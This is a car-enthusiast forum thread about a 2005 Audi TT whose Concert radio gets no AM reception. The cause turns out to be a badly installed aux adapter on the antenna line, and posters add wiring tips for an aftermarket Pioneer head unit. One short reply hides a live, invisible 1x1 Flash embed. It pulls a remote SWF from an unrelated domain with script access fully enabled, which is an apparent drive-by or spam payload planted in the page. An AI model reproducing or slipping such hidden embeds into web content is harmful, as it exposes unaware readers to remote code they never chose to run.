TT (Mk1) Discussion Discussion forum for the Mk1 Audi TT Coupe & Roadster produced from 2000-2006

2005 Audi TT Concert Radio AM not working

Search this Thread

Old 06-17-2012, 05:37 PM
Audiworld Junior Member

Received 0 Likes on 0 Posts
Default 2005 Audi TT Concert Radio AM not working

I have a 2005 Audi TT Concert unit for the Bose system. My issue is the AM radio isn't working. CD player works well, FM radio works decently (not as good as our mazda 3's), but the AM doesn't have any reception.

Any one have any ideas what to test / fix?
Old 06-17-2012, 06:00 PM
Audiworld Junior Member

I found this post, after searching different keywords. I'll try taking it to my mechanic to see if there's something that can be done.

https://www.audiworld.com/forums/sho....php?t=2803525
Old 06-26-2012, 08:59 AM
Audiworld Junior Member

I believe I've narrowed it down to the antenna booster. As this would make sense why FM reception is okay and AM reception is non existant. Now the question is where to find an antenna booster?
Old 06-26-2012, 09:01 AM
Audiworld Junior Member

Also I'm installing a aftermarket stereo (Pioneer 8400) and will test with that before trying to find the module. On the antenna adapter http://enfigcarstereo.com/shopsite_s...l/40_vw53.html there's a blue wire for power. Where should I connect that?
Old 06-26-2012, 10:27 AM
Audiworld Junior Member

Sorry mate, haven't had this problem myself.
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://ihavejustbeenpaid.info/flash/7/1x1.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://ihavejustbeenpaid.info/flash/7/1x1.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Old 06-27-2012, 12:12 PM
AudiWorld Super User

Received 4 Likes on 4 Posts

Originally Posted by andrew13
Also I'm installing a aftermarket stereo (Pioneer 8400) and will test with that before trying to find the module. On the antenna adapter http://enfigcarstereo.com/shopsite_s...l/40_vw53.html there's a blue wire for power. Where should I connect that?
To the blue wire in your aftermarket radio harness. The blue/ white wire is remote turn-on for the amp.
Old 06-28-2012, 10:10 AM
Audiworld Junior Member

There isn't a blue wire on my harness which is what confuses me. I attached it to the blue/white and it worked as it should. I believe that it is only the switch for the antenna booster so it should work the same as the amp turn on.

Side note, I resolved my factory AM reception issue. I pulled out the factory stereo and found out the previous owner had installed a generic aux input improperly on the antenna with the antenna booster connected.
Amazon Amazon
That's the reason my FM and AM reception were so bad. For now I'm running with the stock radio. I'll post a write up when I install the Pioneer 8400 this weekend.
Old 06-28-2012, 10:14 AM
Audiworld Junior Member

Oh and thanks for the advice guys!
Old 06-28-2012, 06:55 PM
AudiWorld Super User

Received 4 Likes on 4 Posts

Originally Posted by andrew13
There isn't a blue wire on my harness which is what confuses me. I attached it to the blue/white and it worked as it should. I believe that it is only the switch for the antenna booster so it should work the same as the amp turn on.

Side note, I resolved my factory AM reception issue. I pulled out the factory stereo and found out the previous owner had installed a generic aux input improperly on the antenna with the antenna booster connected.
http://www.amazon.com/iSimple-IS31-U...sim_sbs_auto_7
That's the reason my FM and AM reception were so bad. For now I'm running with the stock radio. I'll post a write up when I install the Pioneer 8400 this weekend.
Should work with the blue/ white wire as it's a fairly low current draw.Only difference would be when you are not in AM/FM mode you would still be amplifying the antenna.

Make sure you have all the correct aftermarket wiring harnesses, TTs vary a lot in wiring schematics. you shouldn't need to actually cut the original loom, however CAN-bus cars may need an ignition switchable 12 volt. Also some head units often don't fit under the flip down cover.
Old 06-29-2012, 03:58 PM
Audiworld Junior Member

Originally Posted by AudiMick
Should work with the blue/ white wire as it's a fairly low current draw.Only difference would be when you are not in AM/FM mode you would still be amplifying the antenna.
Yeah thought about that, but it doesn't look like theres a viable option in this case.
Make sure you have all the correct aftermarket wiring harnesses, TTs vary a lot in wiring schematics. you shouldn't need to actually cut the original loom, however CAN-bus cars may need an ignition switchable 12 volt. Also some head units often don't fit under the flip down cover.
Yep it's a can-bus system so I'm running a line from the fuse box on a switched power line with an inline fuse to the switched ignition wire on the aftermarket wiring harness. Checking on the fit, I did a quick test fit it fit fine, but that was certainly a concern when I first looked to replace it.

Quick Reply: 2005 Audi TT Concert Radio AM not working